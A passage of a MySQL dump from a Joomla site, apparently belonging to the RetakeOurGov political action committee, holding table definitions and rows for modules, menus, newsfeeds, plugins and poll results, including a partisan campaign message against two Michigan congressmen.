1775</strong></em></p>',0,'user9',63,'2010-06-12 06:52:40',1,'mod_custom',0,0,0,'moduleclass_sfx=\n\n',0,0,''),(44,'Top Menu','',1,'inset',0,'0000-00-00 00:00:00',1,'mod_mainmenu',0,0,0,'menutype=topmenu\nmenu_style=list\nstartLevel=0\nendLevel=1\nshowAllChildren=0\nwindow_open=\nshow_whitespace=0\ncache=1\ntag_id=base-topmenu\nclass_sfx=\nmoduleclass_sfx=\nmaxdepth=10\nmenu_images=0\nmenu_images_align=0\nmenu_images_link=0\nexpand_menu=0\nactivate_parent=0\nfull_active_id=0\nindent_image=0\nindent_image1=\nindent_image2=\nindent_image3=\nindent_image4=\nindent_image5=\nindent_image6=\nspacer=\nend_spacer=\n\n',0,0,''),(43,'Breadcrumbs','',1,'bread',0,'0000-00-00 00:00:00',1,'mod_breadcrumbs',0,0,1,'showHome=1\nhomeText=Home\nseparator=\nmoduleclass_sfx=\ncache=0\ncache_time=900\n\n',1,0,''),(62,'JSN ImageShow','<p style=\"text-align: center;\"><img src=\"images/stories/american-flag.jpg\" border=\"0\" /></p>',2,'promo',0,'0000-00-00 00:00:00',1,'mod_custom',0,0,0,'moduleclass_sfx=\n\n',0,0,''),(39,'Copyright','<p style=\"text-align: left;\"><strong>Paid for by RetakeOurGov </strong><a href=\"http://www.retakeourgov.com/\"><strong>www.RetakeOurGov.com</strong></a><strong>, Wes Nakagiri, Treasurer. <br />Not authorized by any candidate or candidate’s committee.<br />Contributions or gifts to RetakeOurGov are not tax deductible for Federal Income Tax purposes.</strong></p>\r\n<p style=\"text-align: left;\">Copyright © 2009 - 2010 RetakeOurGov.com. All rights reserved unless otherwise stated.</p>',1,'footer',0,'0000-00-00 00:00:00',1,'mod_custom',0,0,0,'moduleclass_sfx=\n\n',0,0,''),(40,'User8 Module','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Nullam sem. Cras erat ipsum, euismod ut, rutrum in, dignissim quis, libero. <a href=\"#\">Praesent fermentum</a>.',1,'user8',0,'0000-00-00 00:00:00',1,'mod_custom',0,0,1,'moduleclass_sfx=\n\n',0,0,''),(38,'Make a Contribution','<p><a href=\"https://secure.piryx.com/donate/ZolDqAzM/Stop-Socialism-B4itz2L8/\" target=\"_blank\"><img src=\"images/stories/donate.gif\" border=\"0\" /></a></p>',0,'user6',0,'0000-00-00 00:00:00',1,'mod_custom',0,0,0,'moduleclass_sfx=-plain icon-help\n\n',0,0,''),(27,'Related Items','',5,'user9',0,'0000-00-00 00:00:00',0,'mod_related_items',0,0,1,'cache=0\nmoduleclass_sfx=',0,0,''),(28,'Search','',3,'left',64,'2010-06-21 22:30:08',1,'mod_search',0,0,1,'moduleclass_sfx=-box box-blue icon-search\nwidth=22\ntext=\nbutton=\nbutton_pos=right\nimagebutton=\nbutton_text=Go\nset_itemid=\ncache=0\ncache_time=900\n\n',0,0,''),(29,'Random Image','',3,'user9',0,'0000-00-00 00:00:00',0,'mod_random_image',0,0,1,'type=jpg\nfolder=\nlink=\nwidth=\nheight=\nmoduleclass_sfx=',0,0,''),(30,'Top Menu','',1,'top',0,'0000-00-00 00:00:00',0,'mod_mainmenu',0,0,1,'class_sfx=\nmoduleclass_sfx=\nmenutype=topmenu\nmenu_style=list_flat\nfull_active_id=0\ncache=0\nmenu_images=0\nmenu_images_align=0\nexpand_menu=0\nactivate_parent=0\nindent_image=0\nindent_image1=\nindent_image2=\nindent_image3=\nindent_image4=\nindent_image5=\nindent_image6=\nspacer=\nend_spacer=',1,0,''),(24,'Archive','',7,'user9',0,'0000-00-00 00:00:00',0,'mod_archive',0,0,1,'count=10\ncache=0\nmoduleclass_sfx=',1,0,''),(25,'Sections','',6,'user9',0,'0000-00-00 00:00:00',0,'mod_sections',0,0,1,'count=5\nmoduleclass_sfx=',1,0,''),(26,'What customers think...','',1,'right',0,'0000-00-00 00:00:00',0,'mod_newsflash',0,0,1,'catid=17\nlayout=default\nimage=0\nlink_titles=\nshowLastSeparator=1\nreadmore=0\nitem_title=0\nitems=\nmoduleclass_sfx=-box box-yellow icon-comment\ncache=0\ncache_time=900\n\n',0,0,''),(21,'Statistics','',8,'user9',62,'2010-06-16 02:11:05',0,'mod_stats',0,0,1,'serverinfo=1\nsiteinfo=1\ncounter=1\nincrease=0\nmoduleclass_sfx=',0,0,''),(22,'Who\'s Online','',3,'right',0,'0000-00-00 00:00:00',0,'mod_whosonline',0,0,1,'cache=0\nshowmode=0\nmoduleclass_sfx=-plain icon-online\n\n',0,0,''),(23,'Popular','',1,'user4',0,'0000-00-00 00:00:00',0,'mod_mostread',0,0,1,'moduleclass_sfx=-plain icon-info\nshow_front=1\ncount=5\ncatid=\nsecid=2,3\ncache=0\ncache_time=900\n\n',0,0,''),(19,'Login Form','',5,'left',0,'0000-00-00 00:00:00',0,'mod_login',0,0,1,'cache=0\nmoduleclass_sfx=-box box-green icon-user\npretext=\nposttext=\nlogin=\nlogout=\ngreeting=1\nname=0\nusesecure=0\n\n',1,0,''),(20,'Latest News','',0,'user3',0,'0000-00-00 00:00:00',1,'mod_latestnews',0,0,1,'count=5\nordering=c_dsc\nuser_id=0\nshow_front=1\nsecid=1\ncatid=\nmoduleclass_sfx=-plain icon-calendar\ncache=0\ncache_time=900\n\n',1,0,''),(17,'User Menu','',2,'user9',0,'0000-00-00 00:00:00',0,'mod_mainmenu',0,1,1,'class_sfx=\nmoduleclass_sfx=\nmenutype=usermenu\nmenu_style=vert_indent\nfull_active_id=0\ncache=0\nmenu_images=0\nmenu_images_align=0\nexpand_menu=0\nactivate_parent=0\nindent_image=0\nindent_image1=\nindent_image2=\nindent_image3=\nindent_image4=\nindent_image5=\nindent_image6=\nspacer=\nend_spacer=',1,0,''),(18,'Main Menu','',1,'mainmenu',62,'2010-06-12 23:57:20',1,'mod_mainmenu',0,0,0,'menutype=mainmenu\nmenu_style=list\nstartLevel=0\nendLevel=0\nshowAllChildren=1\nwindow_open=\nshow_whitespace=0\ncache=0\ntag_id=base-mainmenu\nclass_sfx=\nmoduleclass_sfx=\nmaxdepth=10\nmenu_images=0\nmenu_images_align=0\nmenu_images_link=0\nexpand_menu=0\nactivate_parent=0\nfull_active_id=0\nindent_image=0\nindent_image1=\nindent_image2=\nindent_image3=\nindent_image4=\nindent_image5=\nindent_image6=\nspacer=\nend_spacer=\n\n',1,0,''),(16,'Polls','',7,'left',0,'0000-00-00 00:00:00',1,'mod_poll',0,0,1,'id=17\nmoduleclass_sfx=-box box-blue icon-selection\ncache=0\ncache_time=900\n\n',0,0,''),(1,'RetakeOurGov PAC','',1,'left',0,'0000-00-00 00:00:00',1,'mod_mainmenu',0,0,1,'menutype=tfeatures\nmenu_style=list\nstartLevel=0\nendLevel=1\nshowAllChildren=0\nwindow_open=\nshow_whitespace=0\ncache=1\ntag_id=\nclass_sfx=-treemenu\nmoduleclass_sfx=-box box-grey icon-star\nmaxdepth=10\nmenu_images=0\nmenu_images_align=0\nmenu_images_link=0\nexpand_menu=0\nactivate_parent=0\nfull_active_id=0\nindent_image=0\nindent_image1=\nindent_image2=\nindent_image3=\nindent_image4=\nindent_image5=\nindent_image6=\nspacer=\nend_spacer=\n\n',1,0,''),(67,'Latest JEvents','',11,'left',0,'0000-00-00 00:00:00',0,'mod_jevents_latest',0,0,1,'@spacer=JEV PARAMS\n@spacer=Additional constraints\nmodlatest_inccss=1\nmodlatest_CustFmtStr=${eventDate}[!a: - ${endDate(%I:%M%p)}]<br />${title}\nmodlatest_MaxEvents=10\nmodlatest_Mode=3\nmodlatest_Days=30\nmodlatest_DispLinks=1\n',0,0,''),(70,'Sign in with your social networking account....','',13,'left',0,'0000-00-00 00:00:00',0,'mod_rpx',0,0,1,'cache=0\nmoduleclass_sfx=\npretext=\nposttext=\nlogout=1\ngreeting=1\nname=0\nusesecure=0\nshowlogin=0\n\n',0,0,''),(72,'Michigan\'s Most Wanted','<h1>Congressman Gary Peters (MI - 9th District)</h1>\r\n<h1>Congressman Mark Schauer (MI - 5th District)</h1>\r\n<p style=\"line-height: 15.6pt;\">These two politicians have violated their oath to preserve, protect, and defend the Constitution of the United States of America.  Gary Peters and Mark Schauer embrace the expansion of the Washington D.C. bureaucracy at the expense of our Constitutional freedoms and liberties.   These two career legislators vote with Speaker of the House, Nancy Pelosi virtually 100% of the time.  Both voted to place you, the American citizens, into a socialized health care system while they exempted themselves and their political allies from joining this plan.  They voted to slash Medicare funding for the elderly by $500 billion and they voted to tax medical devices such as prosthetic limbs and heart valves.  If these two long-time politicians viewed Obama Care as a good plan do you really think they would have voted to exempt themselves?  The answer to this question is clearly no!  If socialized medicine is not good enough for Peters and Schauer it is not good enough for the American people.  Fire Gary Peters and Mark Schauer on November 2 and replace Obama Care with a health plan that is controlled by the individual not the Washington establishment.</p>',2,'user4',0,'0000-00-00 00:00:00',0,'mod_custom',0,0,1,'moduleclass_sfx=-plain icon-setting\n\n',0,0,''),(73,'Stay Informed','',2,'left',0,'0000-00-00 00:00:00',1,'mod_acymailing',0,0,1,'effect=normal\nlists=None\nhiddenlists=All\ndisplaymode=vertical\ncheckmode=0\nlistschecked=All\ndropdown=0\noverlay=0\nlink=1\ncustomfields=name,email\nnametext=\nemailtext=\nfieldsize=15\ndisplayfields=0\nintrotext=We\'ll send  you alerts about important legislation and events.\nfinaltext=\nshowsubscribe=1\nshowunsubscribe=0\nsubscribetext=\nunsubscribetext=\nredirectmode=2\nredirectlink=http://www.nsconstruct.com/retakeourgov/index.php?option=com_content&view=article&id=49\nredirectlinkunsub=\nshowterms=0\nshowtermspopup=1\ntermscontent=0\nmootoolsintro=\nmootoolsbutton=\nboxwidth=200\nboxheight=150\nmoduleclass_sfx=\ntextalign=none\n\n',0,0,'');
/*!40000 ALTER TABLE `jos_modules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_modules_menu`
--

DROP TABLE IF EXISTS `jos_modules_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_modules_menu` (
  `moduleid` int(11) NOT NULL DEFAULT '0',
  `menuid` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`moduleid`,`menuid`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_modules_menu`
--

LOCK TABLES `jos_modules_menu` WRITE;
/*!40000 ALTER TABLE `jos_modules_menu` DISABLE KEYS */;
INSERT INTO `jos_modules_menu` VALUES (1,1),(16,1),(17,0),(18,0),(19,1),(19,3),(19,5),(19,8),(19,23),(19,62),(20,1),(20,26),(21,0),(22,1),(22,25),(22,35),(22,36),(23,1),(23,26),(23,27),(23,28),(23,29),(23,30),(23,31),(23,32),(23,33),(23,34),(23,42),(24,0),(25,0),(26,1),(26,3),(26,5),(26,23),(26,27),(26,28),(26,29),(26,30),(26,31),(26,32),(26,33),(26,34),(26,42),(27,0),(28,0),(29,0),(30,1),(30,2),(31,1),(31,26),(31,58),(31,61),(32,0),(33,0),(34,1),(35,1),(36,1),(36,26),(36,58),(37,1),(37,58),(37,61),(38,1),(38,58),(38,61),(39,0),(40,45),(43,0),(44,0),(47,1),(47,3),(47,5),(47,8),(47,23),(47,62),(48,1),(48,50),(49,45),(49,46),(49,47),(49,48),(49,49),(49,53),(49,54),(49,55),(49,57),(49,66),(49,67),(49,68),(49,69),(49,70),(49,72),(50,56),(53,47),(53,68),(54,47),(54,68),(62,1),(65,0),(67,0),(68,0),(69,1),(69,57),(69,58),(69,61),(69,64),(69,110),(69,114),(70,0),(71,0),(72,1),(72,26),(73,0);
/*!40000 ALTER TABLE `jos_modules_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_newsfeeds`
--

DROP TABLE IF EXISTS `jos_newsfeeds`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_newsfeeds` (
  `catid` int(11) NOT NULL DEFAULT '0',
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` text NOT NULL,
  `alias` varchar(255) NOT NULL DEFAULT '',
  `link` text NOT NULL,
  `filename` varchar(200) DEFAULT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `numarticles` int(11) unsigned NOT NULL DEFAULT '1',
  `cache_time` int(11) unsigned NOT NULL DEFAULT '3600',
  `checked_out` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `rtl` tinyint(4) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `published` (`published`),
  KEY `catid` (`catid`)
) ENGINE=MyISAM AUTO_INCREMENT=15 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_newsfeeds`
--

LOCK TABLES `jos_newsfeeds` WRITE;
/*!40000 ALTER TABLE `jos_newsfeeds` DISABLE KEYS */;
INSERT INTO `jos_newsfeeds` VALUES (4,1,'Joomla! Announcements','joomla-official-news','http://feeds.joomla.org/JoomlaAnnouncements','',1,5,3600,0,'0000-00-00 00:00:00',1,0),(4,2,'Joomla! Core Team Blog','joomla-core-team-blog','http://feeds.joomla.org/JoomlaCommunityCoreTeamBlog','',1,5,3600,0,'0000-00-00 00:00:00',2,0),(4,3,'Joomla! Community Magazine','joomla-community-magazine','http://feeds.joomla.org/JoomlaMagazine','',1,20,3600,0,'0000-00-00 00:00:00',3,0),(4,4,'Joomla! Developer News','joomla-developer-news','http://feeds.joomla.org/JoomlaDeveloper','',1,5,3600,0,'0000-00-00 00:00:00',4,0),(4,5,'Joomla! Security News','joomla-security-news','http://feeds.joomla.org/JoomlaSecurityNews','',1,5,3600,0,'0000-00-00 00:00:00',5,0),(5,6,'Free Software Foundation Blogs','free-software-foundation-blogs','http://www.fsf.org/blogs/RSS',NULL,1,5,3600,0,'0000-00-00 00:00:00',4,0),(5,7,'Free Software Foundation','free-software-foundation','http://www.fsf.org/news/RSS',NULL,1,5,3600,0,'0000-00-00 00:00:00',3,0),(5,8,'Software Freedom Law Center Blog','software-freedom-law-center-blog','http://www.softwarefreedom.org/feeds/blog/',NULL,1,5,3600,0,'0000-00-00 00:00:00',2,0),(5,9,'Software Freedom Law Center News','software-freedom-law-center','http://www.softwarefreedom.org/feeds/news/',NULL,1,5,3600,0,'0000-00-00 00:00:00',1,0),(5,10,'Open Source Initiative Blog','open-source-initiative-blog','http://www.opensource.org/blog/feed',NULL,1,5,3600,0,'0000-00-00 00:00:00',5,0),(6,11,'PHP News and Announcements','php-news-and-announcements','http://www.php.net/feed.atom',NULL,1,5,3600,0,'0000-00-00 00:00:00',1,0),(6,12,'Planet MySQL','planet-mysql','http://www.planetmysql.org/rss20.xml',NULL,1,5,3600,0,'0000-00-00 00:00:00',2,0),(6,13,'Linux Foundation Announcements','linux-foundation-announcements','http://www.linuxfoundation.org/press/rss20.xml',NULL,1,5,3600,0,'0000-00-00 00:00:00',3,0),(6,14,'Mootools Blog','mootools-blog','http://feeds.feedburner.com/mootools-blog',NULL,1,5,3600,0,'0000-00-00 00:00:00',4,0);
/*!40000 ALTER TABLE `jos_newsfeeds` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_plugins`
--

DROP TABLE IF EXISTS `jos_plugins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_plugins` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) NOT NULL DEFAULT '',
  `element` varchar(100) NOT NULL DEFAULT '',
  `folder` varchar(100) NOT NULL DEFAULT '',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `published` tinyint(3) NOT NULL DEFAULT '0',
  `iscore` tinyint(3) NOT NULL DEFAULT '0',
  `client_id` tinyint(3) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_folder` (`published`,`client_id`,`access`,`folder`)
) ENGINE=MyISAM AUTO_INCREMENT=56 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_plugins`
--

LOCK TABLES `jos_plugins` WRITE;
/*!40000 ALTER TABLE `jos_plugins` DISABLE KEYS */;
INSERT INTO `jos_plugins` VALUES (1,'Authentication - Joomla','joomla','authentication',0,1,1,1,0,0,'0000-00-00 00:00:00',''),(2,'Authentication - LDAP','ldap','authentication',0,2,0,1,0,0,'0000-00-00 00:00:00','host=\nport=389\nuse_ldapV3=0\nnegotiate_tls=0\nno_referrals=0\nauth_method=bind\nbase_dn=\nsearch_string=\nusers_dn=\nusername=\npassword=\nldap_fullname=fullName\nldap_email=mail\nldap_uid=uid\n\n'),(3,'Authentication - GMail','gmail','authentication',0,4,0,0,0,0,'0000-00-00 00:00:00',''),(4,'Authentication - OpenID','openid','authentication',0,3,0,0,0,0,'0000-00-00 00:00:00',''),(5,'User - Joomla!','joomla','user',0,0,1,0,0,0,'0000-00-00 00:00:00','autoregister=1\n\n'),(6,'Search - Content','content','search',0,1,1,1,0,0,'0000-00-00 00:00:00','search_limit=50\nsearch_content=1\nsearch_uncategorised=1\nsearch_archived=1\n\n'),(7,'Search - Contacts','contacts','search',0,3,1,1,0,0,'0000-00-00 00:00:00','search_limit=50\n\n'),(8,'Search - Categories','categories','search',0,4,1,0,0,0,'0000-00-00 00:00:00','search_limit=50\n\n'),(9,'Search - Sections','sections','search',0,5,1,0,0,0,'0000-00-00 00:00:00','search_limit=50\n\n'),(10,'Search - Newsfeeds','newsfeeds','search',0,6,1,0,0,0,'0000-00-00 00:00:00','search_limit=50\n\n'),(11,'Search - Weblinks','weblinks','search',0,2,1,1,0,0,'0000-00-00 00:00:00','search_limit=50\n\n'),(12,'Content - Pagebreak','pagebreak','content',0,10000,1,1,0,0,'0000-00-00 00:00:00','enabled=1\ntitle=1\nmultipage_toc=1\nshowall=1\n\n'),(13,'Content - Rating','vote','content',0,4,1,1,0,0,'0000-00-00 00:00:00',''),(14,'Content - Email Cloaking','emailcloak','content',0,5,1,0,0,0,'0000-00-00 00:00:00','mode=1\n\n'),(15,'Content - Code Hightlighter (GeSHi)','geshi','content',0,5,0,0,0,0,'0000-00-00 00:00:00',''),(16,'Content - Load Module','loadmodule','content',0,6,1,0,0,0,'0000-00-00 00:00:00','enabled=1\nstyle=0\n\n'),(17,'Content - Page Navigation','pagenavigation','content',0,2,1,1,0,0,'0000-00-00 00:00:00','position=1\n\n'),(18,'Editor - No Editor','none','editors',0,0,1,1,0,0,'0000-00-00 00:00:00',''),(19,'Editor - TinyMCE','tinymce','editors',0,0,1,1,0,0,'0000-00-00 00:00:00','mode=advanced\nskin=0\ncompressed=0\ncleanup_startup=0\ncleanup_save=2\nentity_encoding=raw\nlang_mode=0\nlang_code=en\ntext_direction=ltr\ncontent_css=1\ncontent_css_custom=\nrelative_urls=1\nnewlines=0\ninvalid_elements=applet\nextended_elements=\ntoolbar=top\ntoolbar_align=left\nhtml_height=550\nhtml_width=750\nelement_path=1\nfonts=1\npaste=1\nsearchreplace=1\ninsertdate=1\nformat_date=%Y-%m-%d\ninserttime=1\nformat_time=%H:%M:%S\ncolors=1\ntable=1\nsmilies=1\nmedia=1\nhr=1\ndirectionality=1\nfullscreen=1\nstyle=1\nlayer=1\nxhtmlxtras=1\nvisualchars=1\nnonbreaking=1\ntemplate=0\nadvimage=1\nadvlink=1\nautosave=1\ncontextmenu=1\ninlinepopups=1\nsafari=1\ncustom_plugin=\ncustom_button=\n\n'),(20,'Editor - XStandard Lite 2.0','xstandard','editors',0,0,0,1,0,0,'0000-00-00 00:00:00',''),(21,'Editor Button - Image','image','editors-xtd',0,0,1,0,0,0,'0000-00-00 00:00:00',''),(22,'Editor Button - Pagebreak','pagebreak','editors-xtd',0,0,1,0,0,0,'0000-00-00 00:00:00',''),(23,'Editor Button - Readmore','readmore','editors-xtd',0,0,1,0,0,0,'0000-00-00 00:00:00',''),(24,'XML-RPC - Joomla','joomla','xmlrpc',0,7,0,1,0,0,'0000-00-00 00:00:00',''),(25,'XML-RPC - Blogger API','blogger','xmlrpc',0,7,0,1,0,0,'0000-00-00 00:00:00','catid=1\nsectionid=0\n\n'),(27,'System - SEF','sef','system',0,1,1,0,0,0,'0000-00-00 00:00:00',''),(28,'System - Debug','debug','system',0,2,1,0,0,0,'0000-00-00 00:00:00','queries=1\nmemory=1\nlangauge=1\n\n'),(29,'System - Legacy','legacy','system',0,3,0,1,0,0,'0000-00-00 00:00:00','route=0\n\n'),(30,'System - Cache','cache','system',0,4,0,1,0,0,'0000-00-00 00:00:00','browsercache=0\ncachetime=15\n\n'),(31,'System - Log','log','system',0,5,0,1,0,0,'0000-00-00 00:00:00',''),(32,'System - Remember Me','remember','system',0,6,1,1,0,0,'0000-00-00 00:00:00',''),(33,'System - Backlink','backlink','system',0,7,0,1,0,0,'0000-00-00 00:00:00',''),(34,'Content - JSN ImageShow','imageshow','content',0,0,1,0,0,0,'0000-00-00 00:00:00',''),(35,'System - JSN ImageShow','imageshow','system',0,0,1,0,0,0,'0000-00-00 00:00:00',''),(36,'System - PowerMail 4 Joomla Cron','powermail','system',0,100,1,0,0,0,'0000-00-00 00:00:00',''),(37,'Search - JEvents','eventsearch','search',0,0,1,0,0,0,'0000-00-00 00:00:00','search_limit=50\ndate_format=%Y-%m-%d\n'),(38,'Content - JComments','jcomments','content',0,10001,1,0,0,0,'0000-00-00 00:00:00',''),(39,'Search - JComments','jcomments','search',0,7,1,0,0,0,'0000-00-00 00:00:00',''),(40,'System - JComments','jcomments','system',0,101,1,0,0,0,'0000-00-00 00:00:00',''),(41,'Editor Button - JComments ON','jcommentson','editors-xtd',0,1,1,0,0,0,'0000-00-00 00:00:00',''),(42,'Editor Button - JComments OFF','jcommentsoff','editors-xtd',0,1,1,0,0,0,'0000-00-00 00:00:00',''),(43,'User - JComments','jcomments','user',0,1,1,0,0,0,'0000-00-00 00:00:00',''),(44,'Content - Marco\'s noFollow','marconofollow','content',0,0,1,0,0,0,'0000-00-00 00:00:00','mode=1\ntarget=1\n\n'),(45,'Ulti RPX','ultirpx','system',0,0,0,0,0,0,'0000-00-00 00:00:00','usecurl=1\nfakemail=1\n'),(46,'AcyMailing onPrepareContent trigger','contentplugin','acymailing',0,15,0,0,0,0,'0000-00-00 00:00:00','help=plugin-contentplugin\n'),(47,'AcyMailing Tag : online links','online','acymailing',0,6,1,0,0,0,'0000-00-00 00:00:00','help=plugin-online\nviewtemplate=standard\nforwardtemplate=standard\n'),(48,'AcyMailing : Statistics Plugin','stats','acymailing',0,50,1,0,0,0,'0000-00-00 00:00:00','help=plugin-stats\npicture=components/com_acymailing/images/statpicture.png\nwidth=50\nheight=1\n'),(49,'AcyMailing Tag : content insertion','tagcontent','acymailing',0,11,1,0,0,0,'0000-00-00 00:00:00','help=plugin-tagcontent\ndisplayart=all\nremovepictures=never\nremovejs=yes\ncontentaccess=registered\n'),(50,'AcyMailing Tag : Subscriber information','tagsubscriber','acymailing',0,2,1,0,0,0,'0000-00-00 00:00:00','help=plugin-tagsubscriber\n'),(51,'AcyMailing Tag : Manage the Subscription','tagsubscription','acymailing',0,1,1,0,0,0,'0000-00-00 00:00:00','help=plugin-tagsubscription\n'),(52,'AcyMailing Tag : Date / Time','tagtime','acymailing',0,5,1,0,0,0,'0000-00-00 00:00:00','help=plugin-tagtime\n'),(53,'AcyMailing Tag : Joomla User Informations','taguser','acymailing',0,3,1,0,0,0,'0000-00-00 00:00:00','help=plugin-taguser\n'),(54,'AcyMailing Template Class Replacer','template','acymailing',0,25,1,0,0,0,'0000-00-00 00:00:00','help=plugin-template\n'),(55,'AcyMailing : (auto)Subscribe during Joomla registration','regacymailing','system',0,0,1,0,0,0,'0000-00-00 00:00:00','help=plugin-regacymailing\nautosub=None\nlists=None\nlistschecked=All\nfieldafter=password\n');
/*!40000 ALTER TABLE `jos_plugins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_poll_data`
--

DROP TABLE IF EXISTS `jos_poll_data`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_poll_data` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `pollid` int(11) NOT NULL DEFAULT '0',
  `text` text NOT NULL,
  `hits` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `pollid` (`pollid`,`text`(1))
) ENGINE=MyISAM AUTO_INCREMENT=49 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_poll_data`
--

LOCK TABLES `jos_poll_data` WRITE;
/*!40000 ALTER TABLE `jos_poll_data` DISABLE KEYS */;
INSERT INTO `jos_poll_data` VALUES (1,14,'Community Sites',2),(2,14,'Public Brand Sites',3),(3,14,'eCommerce',1),(4,14,'Blogs',0),(5,14,'Intranets',0),(6,14,'Photo and Media Sites',2),(7,14,'All of the Above!',3),(8,14,'',0),(9,14,'',0),(10,14,'',0),(11,14,'',0),(12,14,'',0),(13,15,'Blue',128),(14,15,'Red',58),(15,15,'Orange',42),(16,15,'Green',38),(17,15,'Grey',25),(18,15,'Violet',13),(19,15,'',0),(20,15,'',0),(21,15,'',0),(22,15,'',0),(23,15,'',0),(24,15,'',0),(25,16,'Democrat',0),(26,16,'Independent',0),(27,16,'Libertarian',0),(28,16,'Republican',1),(29,16,'Tea Party',1),(30,16,'Other',0),(31,16,'',0),(32,16,'',0),(33,16,'',0),(34,16,'',0),(35,16,'',0),(36,16,'',0),(37,17,'Yes',1),(38,17,'No',0),(39,17,'',0),(40,17,'',0),(41,17,'',0),(42,17,'',0),(43,17,'',0),(44,17,'',0),(45,17,'',0),(46,17,'',0),(47,17,'',0),(48,17,'',0);
/*!40000 ALTER TABLE `jos_poll_data` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_poll_date`
--

DROP TABLE IF EXISTS `jos_poll_date`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_poll_date` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `vote_id` int(11) NOT NULL DEFAULT '0',
  `poll_id` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `poll_id` (`poll_id`)
) ENGINE=MyISAM AUTO_INCREMENT=871 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_poll_date`
--

LOCK TABLES `jos_poll_date` WRITE;
/*!40000 ALTER TABLE `jos_poll_date` DISABLE KEYS */;
INSERT INTO `jos_poll_date` VALUES (1,'2006-10-09 13:01:58',1,14),(2,'2006-10-10 15:19:43',7,14),(3,'2006-10-11 11:08:16',7,14),(4,'2006-10-11 15:02:26',2,14),(5,'2006-10-11 15:43:03',7,14),(6,'2006-10-11 15:43:38',7,14),(7,'2006-10-12 00:51:13',2,14),(8,'2007-05-10 19:12:29',3,14),(9,'2007-05-14 14:18:00',6,14),(10,'2007-06-10 15:20:29',6,14),(11,'2007-07-03 12:37:53',2,14),(564,'2009-09-08 09:29:13',15,15),(565,'2009-09-11 06:18:01',15,15),(566,'2009-09-11 07:11:59',13,15),(567,'2009-09-12 11:56:28',13,15),(568,'2009-09-13 11:21:27',15,15),(569,'2009-09-14 10:06:11',16,15),(570,'2009-09-14 15:17:31',13,15),(571,'2009-09-14 19:20:05',13,15),(572,'2009-09-14 21:41:26',14,15),(573,'2009-09-15 10:16:28',13,15),(574,'2009-09-17 15:17:07',14,15),(575,'2009-09-18 09:02:47',16,15),(576,'2009-09-19 03:53:09',13,15),(577,'2009-09-21 03:20:54',13,15),(578,'2009-09-21 18:59:04',17,15),(579,'2009-09-22 09:14:06',13,15),(580,'2009-09-23 15:40:10',16,15),(581,'2009-09-24 03:11:22',15,15),(582,'2009-09-24 03:42:09',14,15),(583,'2009-09-26 02:30:46',16,15),(584,'2009-09-27 05:16:19',15,15),(585,'2009-09-27 10:25:33',13,15),(586,'2009-09-27 17:38:25',14,15),(587,'2009-09-29 10:13:58',13,15),(588,'2009-10-04 08:11:52',13,15),(589,'2009-10-04 13:38:47',16,15),(590,'2009-10-05 06:53:16',13,15),(591,'2009-10-05 08:20:52',16,15),(592,'2009-10-07 10:27:23',13,15),(593,'2009-10-07 17:48:41',13,15),(594,'2009-10-09 06:45:42',16,15),(595,'2009-10-09 17:37:49',15,15),(596,'2009-10-11 10:49:06',13,15),(597,'2009-10-12 01:19:11',13,15),(598,'2009-10-12 06:05:27',13,15),(599,'2009-10-13 06:04:49',14,15),(600,'2009-10-13 10:01:22',18,15),(601,'2009-10-14 03:09:34',17,15),(602,'2009-10-14 10:11:33',13,15),(603,'2009-10-16 16:24:27',13,15),(604,'2009-10-16 18:06:18',15,15),(605,'2009-10-17 21:14:57',17,15),(606,'2009-10-19 17:16:23',13,15),(607,'2009-10-19 22:38:05',13,15),(608,'2009-10-21 06:03:27',13,15),(609,'2009-10-22 13:02:12',15,15),(610,'2009-10-22 15:50:35',13,15),(611,'2009-10-23 10:44:18',16,15),(612,'2009-10-25 04:39:28',16,15),(613,'2009-10-25 17:13:34',13,15),(614,'2009-10-26 06:41:26',18,15),(615,'2009-10-26 